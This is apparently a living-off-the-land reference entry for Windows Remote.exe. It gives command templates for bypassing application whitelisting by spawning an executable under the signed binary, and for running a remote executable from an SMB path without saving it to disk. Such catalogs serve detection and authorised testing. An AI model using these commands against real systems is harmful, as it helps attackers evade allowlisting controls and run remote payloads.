.. /Remote.exe
Star

AWL bypass (EXE)
Execute (EXE, Remote)

Debugging tool included with Windows Debugging Tools

Paths:

Resources:

Acknowledgements:

Detections:

AWL bypass

  1. Spawns specified executable as a child process of remote.exe

    Remote.exe /s {PATH:.exe} anythinghere
    Use case
    Executes a process under a trusted Microsoft signed binary
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1127
    Tags
    Execute: EXE

Execute

  1. Spawns specified executable as a child process of remote.exe

    Remote.exe /s {PATH:.exe} anythinghere
    Use case
    Executes a process under a trusted Microsoft signed binary
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1127
    Tags
    Execute: EXE
  2. Run a remote file

    Remote.exe /s {PATH_SMB:.exe} anythinghere
    Use case
    Executing a remote binary without saving file to disk
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1127
    Tags
    Execute: EXE
    Execute: Remote